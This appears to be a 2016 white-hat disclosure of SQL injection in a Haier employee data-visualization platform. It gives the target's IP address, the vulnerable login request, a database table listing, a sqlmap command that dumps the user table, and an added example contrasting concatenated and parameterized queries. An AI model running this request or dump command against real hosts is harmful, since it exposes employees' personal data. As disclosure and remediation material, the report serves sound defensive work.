2016-05-16: Details sent to the vendor, awaiting the vendor's response
2016-05-17: Vendor confirmed; details disclosed to the vendor only
2016-05-27: Details disclosed to core white hats and relevant domain experts
2016-06-06: Details disclosed to regular white hats
2016-06-16: Details disclosed to intern white hats
2016-07-01: Details disclosed to the public
SQL injection in a Haier Group system (leaks 100,000 employee records: names, employee IDs, mobile numbers, departments, internal email addresses)
Haier information platform (the "information to person" data visualization system): http://27.223.99.106:3000/login/log?next=%2F
The uname parameter of the login POST is vulnerable to SQL injection.
POST /login/log?next=%2F HTTP/1.1
Host: 27.223.99.106:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://27.223.99.106:3000/login/log?next=%2F
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229fba818f4569021e9902e3817561aee7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A46.0%29+Gecko%2F20100101+Firefox%2F46.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463375397%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dad271c28f09793bbbe4559883da794a536f88de6; PHPSESSID=sqn7nb2oupcg98ecu46q2vvad0
Connection: keep-alive

uname=admin&password=123456&commit=%E7%99%BB%E5%BD%95
4 databases
Tables
+--------------------------------+
| ODSXWPT_V_HRIT_XWPT_INFO       |
| Sheet1                         |
| USER_INFO                      |
| VDATA_CST_HR_EMP_BASE          |
| a1                             |
| a2                             |
| a3                             |
| a4                             |
| db1                            |
| db2                            |
| t_idm_user                     |
| temp_userxw                    |
| vdata_alarm                    |
| vdata_alarm_log                |
| vdata_alarm_max_time           |
| vdata_alarm_msg                |
| vdata_alarm_options            |
| vdata_alarm_org                |
| vdata_alarm_role               |
| vdata_alarm_temp               |
| vdata_alarm_template           |
| vdata_alarm_value              |
| vdata_brand                    |
| vdata_channel                  |
| vdata_child_industry           |
| vdata_collection               |
| vdata_dashboard_action         |
| vdata_dashboard_group          |
| vdata_dashboardgroup_post      |
| vdata_dashborad                |
| vdata_dashborad_0514           |
| vdata_dashbord_0515            |
| vdata_datachart_new            |
| vdata_datachart_new_0514       |
| vdata_datasource               |
| vdata_datasource_auth          |
| vdata_datasource_bak_0330      |
| vdata_datasource_config        |
| vdata_datasource_folder        |
| vdata_datasource_user          |
| vdata_dimensions               |
| vdata_dimensions_column        |
| vdata_grid_info                |
| vdata_grid_org                 |
| vdata_index                    |
| vdata_index_count              |
| vdata_industry                 |
| vdata_kpi_displaydef           |
| vdata_log                      |
| vdata_micro_member             |
| vdata_mirror_dashboard_group   |
| vdata_mirror_dashboard_org     |
| vdata_mirror_dashboard_role    |
| vdata_mirror_dashborad_chart   |
| vdata_monitors                 |
| vdata_new_log_all              |
| vdata_new_log_all_m            |
| vdata_new_log_all_month        |
| vdata_new_log_all_month_m      |
| vdata_new_log_class            |
| vdata_new_log_day              |
| vdata_new_log_dg_view          |
| vdata_new_log_master_day       |
| vdata_new_log_master_month     |
| vdata_new_log_month            |
| vdata_new_log_org_day          |
| vdata_new_log_org_month        |
| vdata_new_log_time_day         |
| vdata_new_log_time_month       |
| vdata_new_log_totle            |
| vdata_new_log_wgxw             |
| vdata_new_org_day_rate         |
| vdata_new_org_month_rate       |
| vdata_org                      |
| vdata_org_class                |
| vdata_org_class_disConfig      |
| vdata_org_class_disConfig_back |
| vdata_org_copy                 |
| vdata_org_dg                   |
| vdata_org_dic                  |
| vdata_org_index                |
| vdata_org_moblie_menu          |
| vdata_org_relation             |
| vdata_org_user                 |
| vdata_personal_folder          |
| vdata_platform                 |
| vdata_post                     |
| vdata_recent_view              |
| vdata_role                     |
| vdata_role_org                 |
| vdata_role_org_folder          |
| vdata_role_topic               |
| vdata_search_history           |
| vdata_small_v_platform         |
| vdata_sys_enum                 |
| vdata_sys_folder               |
| vdata_time_dic_bak2            |
| vdata_time_haier_dic           |
| vdata_tools_role_org           |
| vdata_user                     |
| vdata_user_brand               |
| vdata_user_channel             |
| vdata_user_industry            |
| vdata_user_org                 |
| vdata_user_post                |
| vdata_user_role                |
| vdata_v_alarm                  |
| vdata_v_dashboard_group        |
| vdata_v_dashboard_group_mirror |
| vdata_v_dashboard_personal     |
| vdata_v_index                  |
| vdata_v_org_wg                 |
| vdata_v_platform               |
| vdata_v_role_org_folder        |
| vdata_v_user                   |
| vdata_v_user_dept_info         |
| vdata_v_user_org               |
| vdata_v_xw_index               |
+--------------------------------+
About 100,000 records
Thirty sample rows were extracted (deleted after the report was submitted).
sqlmap.py -r 1.txt -D "vdata" -T "vdata_user" --dump --start 10030 --stop 10060
(All extracted data was deleted after the report was submitted.)
Fix
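The report leaves the fix section empty. As an added illustration (not code from the reporter, Haier or the platform), the snippet below models the login handler's query over a constructed `vdata_user` table, first built by string concatenation (the class of defect that makes `uname` injectable) and then with a parameterized query; the column names, the Python/SQLite stand-in for the PHP application and the sample rows are all assumptions.

```python
import sqlite3

# Constructed sample rows standing in for vdata_user; the real schema is not
# on the page, so the column names are assumptions. A real system would store
# password hashes, not cleartext, but that is not the point illustrated here.
SAMPLE_USERS = [("admin", "s3cret-admin"), ("alice", "hunter2")]


def make_db():
    """Build an in-memory SQLite database with the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vdata_user (uname TEXT, password TEXT)")
    conn.executemany("INSERT INTO vdata_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, uname, password):
    """Vulnerable pattern: the POSTed uname/password are pasted into the SQL
    text, so quote characters in uname become part of the query grammar."""
    sql = ("SELECT uname FROM vdata_user WHERE uname = '%s' AND password = '%s'"
           % (uname, password))
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, uname, password):
    """Hardened pattern: placeholders are bound by the driver, so whatever the
    client sends in uname is compared as a literal string, never parsed as SQL."""
    sql = "SELECT uname FROM vdata_user WHERE uname = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (uname, password))]


if __name__ == "__main__":
    db = make_db()
    # Legitimate credentials work identically in both versions.
    print(login_concat(db, "admin", "s3cret-admin"), login_param(db, "admin", "s3cret-admin"))
    # A uname that closes the quote and comments out the password check
    # authenticates in the concatenated version and is simply a non-matching
    # literal in the parameterized one.
    print(login_concat(db, "admin' --", "123456"), login_param(db, "admin' --", "123456"))
```

The same binding discipline applies to the framework's query builder in the PHP application: every value that originates in the request must reach the database as a bound parameter, not as query text.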
Severity: High
Vulnerability Rank: 12
Confirmed: 2016-05-17 09:39
Thanks to the white hat for the testing and the heads-up; staff have been assigned to handle it.
None yet